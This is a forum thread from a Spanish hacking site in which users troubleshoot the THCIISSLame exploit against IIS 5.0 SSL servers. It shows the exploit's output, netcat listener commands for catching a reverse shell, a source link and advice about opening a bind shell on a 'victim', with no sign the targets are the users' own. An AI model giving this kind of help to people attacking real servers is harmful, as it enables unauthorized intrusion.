elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 06:14  


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Ayuda con el Exploit THCIISSLame v0.2
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con el Exploit THCIISSLame v0.2  (Leído 3,787 veces)
griever

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Ayuda con el Exploit THCIISSLame v0.2
« en: 18 Agosto 2004, 12:38 »

Hola, bueno quisiera que me yudaran con este exploit.

Ya lo tengo compilado
Tambien ya encontre un serve Vulnerable
Inicio en Proceso para Explotarlo

   y aparece esto:
           
             
  • building buffer
  • connecting the target
  • exploit send
  • waiting for shell

 y hasta ahi se queda.

   Ya lei el otro tema de ayuda de este exploit donde dicen que hay que dejar escuchando un puerto con el netcat tambien ago eso.
     
   asi:
          c:>nc -L -p 1221

   Pero no recibo nada y se queda el exploit parado como les mostre arriba.

     Tambien me aparece un error
    este:
         
             
  • building buffer
  • connecting the target
  • exploit send
  • waiting for shell
             bind error() 10048

----------------------------------------------------------------------
bueno ahora saliendo de eso supongamos que ya funciono.

donde aparecera la shell que me mande?
  en mi msdos o en un archivo, la pregunta es donde?
En línea
Sir_Neo

Desconectado Desconectado

Mensajes: 203


$ir ||ê0


Ver Perfil WWW
Re: Ayuda con el Exploit THCIISSLame v0.2
« Respuesta #1 en: 18 Agosto 2004, 19:51 »

Cuando te la devuelva, lo sabrás.  :D
En línea

Si juegas con el mejor, muere como los demás

http://www.lepeonline.net/
bano


Desconectado Desconectado

Mensajes: 316


Ver Perfil
Re: Ayuda con el Exploit THCIISSLame v0.2
« Respuesta #2 en: 18 Agosto 2004, 21:57 »

quizas el host este parcheado ...

saludosss  ;)
psd: no se si lo sabras, pero existe otra version mas actualizada de ese exploit ...

http://thc.org/exploits/THCIISSLame.c
En línea
Rentero
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.163


La paciencia es la madre de la ciencia.


Ver Perfil
Re: Ayuda con el Exploit THCIISSLame v0.2
« Respuesta #3 en: 19 Agosto 2004, 00:50 »

Primero dejas el netcat escuchando y despues usas el exploit...si funciona tendrás la shell en la cmd del netcat...como ya te han dicho. Te darás cuenta.
En línea

Firmado.
EL_ZoRRo

Desconectado Desconectado

Mensajes: 234



Ver Perfil
Re: Ayuda con el Exploit THCIISSLame v0.2
« Respuesta #4 en: 20 Agosto 2004, 13:53 »

Mira segun me acuerdo de aberlo probado y logrado muchas shells leste exploit siempre me funciono sin dejar el netcat a la escucha  ya que el mismo ejecuta una shell  inversa que luego se conectara a tu equipo siempre y cuando especifiques la Ip correcta del mismo
Y te recomiiendo que lo realñices sobre el puerto 31337.

Saludos
En línea
Jindalae

Desconectado Desconectado

Mensajes: 88


ハッカー ¤Clðn ByT€¤


Ver Perfil
Re: Ayuda con el Exploit THCIISSLame v0.2
« Respuesta #5 en: 4 Septiembre 2004, 09:19 »

Actualiza el xploit, fijate en

http://thc.org/exploits/THCIISSLame.c

como dice bano, que esta muy buena la pag
En línea

B‚Ƀƒuî•ñ‚ɔނ玩g‚ð•ù‚°‚½ ŒvŽZ ‚ÌŒvŽZ ‚ÌlX‚ÌŽž‘ã‚ÌŒ´‘¥.
nano1706

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Ayuda con el Exploit THCIISSLame v0.2
« Respuesta #6 en: 6 Enero 2006, 14:04 »

Hola a todos, realmente queria felicitar a las personas que hacen posible esta web,
es alucinante la cantidad de info que hay y lo que es mejor para todos los niveles
de conocimiento, no soy nada experto en estos temas y la forma de explicar algunas
cosas es pa' el pueblo y no para unos pocos!

Bueno ahora si, viene la pregunta respecto de la ejecucion del exploit "THCIISSLame.exe"
esto es lo que hago y no pasa nada, pero lo que me desconcierta es el mensaje de
"Exploit successful ! Have fun !"....


1º Ejecuto el exploit en un CMD


C:\temp\exploits>THCIISSLame.exe <victim-host> <connectback-ip> 31337

THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

  • building buffer
  • connecting the target
  • exploit send
  • waiting for shell




2º En otro CMD executo

C:\temp\nc>nc localhost 31337




3º En el CMD del paso 1 sale lo siguiente

C:\temp\exploits>THCIISSLame.exe <victim-host> <connectback-ip> 31337

THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

  • building buffer
  • connecting the target
  • exploit send
  • waiting for shell
  • Exploit successful ! Have fun !
  • --------------------------------------------------------------------


El problema es que no hace nada mas! alguna sugerencia?
y si intento primero ejecutar el nc en mi PC y despues el
exploit genera el siguiente mensaje:


1º Ejecutar el nc de forma local

C:\temp\nc>nc -v -l -p 31337
listening on [any] 31337 ...



2º Ejecutar el exploit

C:\temp\exploits>THCIISSLame.exe <victim-host> <connectback-ip> 31337

THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

  • building buffer
  • connecting the target
  • exploit send
bind error() 10048


Muchas gracias!!!!

PD: Rojodos, muy pero muy bueno los documentos que posteas, y como dije antes de facil entendimiento!!!
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Ayuda con el Exploit THCIISSLame v0.2
« Respuesta #7 en: 6 Enero 2006, 23:03 »



building buffer

connecting the target

exploit send

waiting for shell

Exploit successful ! Have fun !

--------------------------------------------------------------------

debajo de esto sale
C:\>
o algo por el estilo?
estas usando la ultima version del exploit?
sino, analiza el exploit, y ve donde esta el error :)

Saludos!!
En línea

EL_ZoRRo

Desconectado Desconectado

Mensajes: 234



Ver Perfil
Re: Ayuda con el Exploit THCIISSLame v0.2
« Respuesta #8 en: 6 Enero 2006, 23:45 »

Citar
*                                                                           */
/* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports      */
/* v0.2 - This little update uses a connectback shell !                      */
/* v0.1 - First release with portbinding shell on 31337                      */
/*                                                                           */

Como se ve en tu codigo tienes la version 0.2 por ende tendria que retornar la shell de system aveces los servers pueden tener IDS, firrewall  o estar pacheados es vieja la vuln no creo que haya muchos serveres con este bug.

Salu2
« Última modificación: 6 Enero 2006, 23:48 por EL_ZoRRo » En línea
jdc2

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Ayuda con el Exploit THCIISSLame v0.2
« Respuesta #9 en: 20 Febrero 2006, 17:39 »

Si estoy en un lan detras de un router y quiero usar el exploit en un servidor atravez del internet, como puedo utilizar el nc y el exploit?
« Última modificación: 20 Febrero 2006, 17:43 por jdc2 » En línea
oRTNZ


Desconectado Desconectado

Mensajes: 808


no no soy malo... soy vicioso :p


Ver Perfil
Re: Ayuda con el Exploit THCIISSLame v0.2
« Respuesta #10 en: 21 Febrero 2006, 19:25 »

:)
« Última modificación: 22 Febrero 2006, 19:19 por oRTNZ » En línea

(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Ayuda con el Exploit THCIISSLame v0.2
« Respuesta #11 en: 22 Febrero 2006, 07:22 »

debes configurar tu router.. pero mejor deja un bind shell, asi tu te conectas a tu victima.. te sacas de problemas :P

Saludos!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines